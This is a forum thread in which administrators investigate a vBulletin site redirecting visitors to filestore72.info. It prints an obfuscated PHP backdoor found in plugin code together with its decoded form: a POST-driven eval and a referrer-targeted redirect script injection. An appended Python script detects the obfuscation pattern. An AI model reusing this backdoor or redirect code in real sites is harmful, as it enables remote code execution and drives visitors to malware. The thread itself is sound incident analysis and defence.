Thread: encode.su hacked ? : redirect to filestore72.info

  1. #1
    Member

    encode.su hacked ? : redirect to filestore72.info

    Possibly "encode.su" hacked to redirect links to "filestore72.info".
    Please check!
    I've found some info here: Vbulletin hacked

    Tweet 1 : R2Games: In late 2015, the gaming website R2Games was hacked and more than 2.1M personal records disclosed. The vBulletin forum included IP addresses and passwords stored as salted hashes using a weak implementation enabling many to be rapidly cracked.

    Tweet 2: I hacked together a template hot-loader for vBulletin that lets you dump all template files and modify them directly...

  2. Thanks (2):

    schnaader (30th August 2019),Shelwien (30th August 2019)

  3. #2
    Administrator Shelwien's Avatar
    I don't think it was hacked - probably webmaster's legacy. He had some SEO scripts etc, I probably missed something.

  4. #3
    Administrator Shelwien's Avatar
    Yeah, it's apparently a consequence of the "vbseo" plugin, which inserted exploit code into the init code of the "post thanks" plugin.
    I removed it - apparently it existed since long ago, even on encode.ru (present in my DB snapshots).

    Exploit code is like this:
    Code:
    $pt = '661c299f5877f7e1368f61a143062e6d';
    $arrvb = '30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&B;"8OzCJBg._BVg&O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+"8?V/jR>)=nqJ>"qJ>z>6rwJ)~^")=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV"&9+gq<zO6:kr!D[|Z:z|~6m"=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A"BVAm"8?zCJK+g>Am"=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR>)=bn6=#7wJz>C_VE7%fm";R>Cel>l%AkKJ6E.q^q6Jw"BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm";R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m"wR>C[9>KJo>B&6m"8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+"_6#l&0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr<VbQ=m";RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`';
    $ajx = ':eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<';
    $ajx2 = '.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p';
    $baseline = '%s%'.substr($arrvb, 733, 1);
    $gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');
    which is decrypted to

    Code:
    $q='ini_set';
    if(function_exists($q)){
        $q('display_errors',0);
        $q('log_errors',0);
    }
    // backdoor: evaluates code sent in the POST field named by $pt
    if(isset($_POST[$pt]))eval(base64_decode(str_rot13($_POST[$pt])));
    // $u: user agent looks like a crawler (regex delimiters are not visible in the post as rendered)
    $u=@preg_match('
    bot|spider|crawl|slurp|yandex
    i',$_SERVER['HTTP_USER_AGENT']);
    $s=@parse_url($_SERVER['HTTP_REFERER']);
    $t=@$s['host'];
    // $r: referrer host is a search engine, social site or URL shortener
    $r=@preg_match('
    live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly
    i',$t)||$t=='t.co';
    $h=@$_SERVER['HTTP_HOST'];
    $p=@COOKIE_PREFIX;
    $a=@THIS_SCRIPT==='misc';
    $c=$p.'lastvisit';
    $n=$p.'lang_id';
    $y=@ord(FILE_VERSION)>51;
    $z=empty($_SERVER['HTTP_X_MOZ']);
    // $j: script tag that loads misc.php?v=...&js=js from the forum itself
    $j='<script type="text/javascript" src="'.$vbulletin->options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;js=js"></script>';
    // only acts while the "lang_id" cookie is not set
    if(empty($_COOKIE[$n])){
        // request for misc.php?v=...&js=js: emit the redirect as JavaScript
        if($a&&isset($_GET['v'])&&(isset($_GET['js']))&&(!empty($_COOKIE[$c]))){
            if($t==$h){
                if($z)setcookie($n,'en',time()+36000);
                $m=substr(md5($h),0,8);
                print("document.location='http://filestore72.info/download.php?id={$m}'");
            }
            exit;
        }
        // non-crawler visitor arriving from one of the listed referrers: inject the script tag
        if((!$u)&&$r){
            if($y){
                $GLOBALS['template_hook']['headinclude_javascript'].=$j;
            }else{
                $GLOBALS['style']['css'].=$j;
            }
        }
    }

  5. Thanks:

    schnaader (30th August 2019)

  6. #4
    Administrator Shelwien's Avatar
    "First we need to understand the source of the virus. If you use the following plug-ins on your site, the virus enters your site through these plug-ins.

    VSA Chat,
    VSA Advanced Statistics,
    Ajax Advanced Statistics,
    vBSEO,
    vBSEO Sitemap Generator

    The virus adds its own code to the database and is very difficult to find. In addition, if you delete the virus codes, malicious codes are added again after 1 day."
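
An added example, not part of the original posts and not code from vBulletin or any plugin: a static triage script for the obfuscation pattern shown in post #3 (a blob passed through `strtr()` with two substitution alphabets), meant for plugin code exported from the database, where post #4 says the injected code lives. The `(title, phpcode)` row layout, the function names and the sample rows are assumptions constructed for illustration; the decode is done in Python and no PHP is executed.

```python
import re

# PHP single-quoted assignments: $name = '...';
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;", re.S)
# strtr($blob, $from, $to) with three plain variables, as in the posted sample
STRTR = re.compile(r"strtr\(\s*\$(\w+)\s*,\s*\$(\w+)\s*,\s*\$(\w+)\s*\)")
KEYWORDS = ("eval(", "base64_decode", "str_rot13", "$_POST", "preg_replace")

def is_alphabet(s, min_len=64):
    """Substitution alphabet: a long string in which no character repeats."""
    return len(s) >= min_len and len(set(s)) == len(s)

def php_strtr(text, src, dst):
    """Static equivalent of PHP strtr($text, $src, $dst); nothing is executed."""
    n = min(len(src), len(dst))  # PHP ignores the extra characters of the longer string
    return text.translate(str.maketrans(src[:n], dst[:n]))

def scan_plugin(phpcode):
    """Return one finding per strtr() call that uses two substitution alphabets."""
    strings = dict(ASSIGN.findall(phpcode))
    findings = []
    for blob, src, dst in STRTR.findall(phpcode):
        if not all(v in strings for v in (blob, src, dst)):
            continue
        if not (is_alphabet(strings[src]) and is_alphabet(strings[dst])):
            continue
        decoded = php_strtr(strings[blob], strings[src], strings[dst])
        findings.append({"blob_var": blob, "decoded": decoded,
                         "keywords": [k for k in KEYWORDS if k in decoded]})
    return findings

def constructed_rows():
    """Constructed test data (not the blob from the post), made-up alphabets."""
    base = "".join(chr(c) for c in range(33, 127) if chr(c) not in "'\\")
    src, dst = base[::-1], base[7:] + base[:7]
    payload = "if(isset($_POST[$k]))eval(base64_decode($_POST[$k]));"
    blob = payload.translate(str.maketrans(dst, src))  # inverse of the decode step
    bad = (f"$a = '{blob}';\n$b = '{src}';\n$c = '{dst}';\n"
           "$g = preg_replace($p, strtr($a, $b, $c), 'vbseo');")
    good = "$label = 'Thanks';\n$out = strtr($label, 'T', 't');"
    return [("post thanks init", bad), ("benign hook", good)]

def flagged_titles(rows):
    return [title for title, code in rows if scan_plugin(code)]

if __name__ == "__main__":
    for title, code in constructed_rows():
        for f in scan_plugin(code):
            print(title, "->", f["keywords"], "|", f["decoded"])
```

A row is flagged on the structure alone (two non-repeating alphabets feeding `strtr()`), so it is still reported when the decoded text is a further encoded layer and matches none of the keywords.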
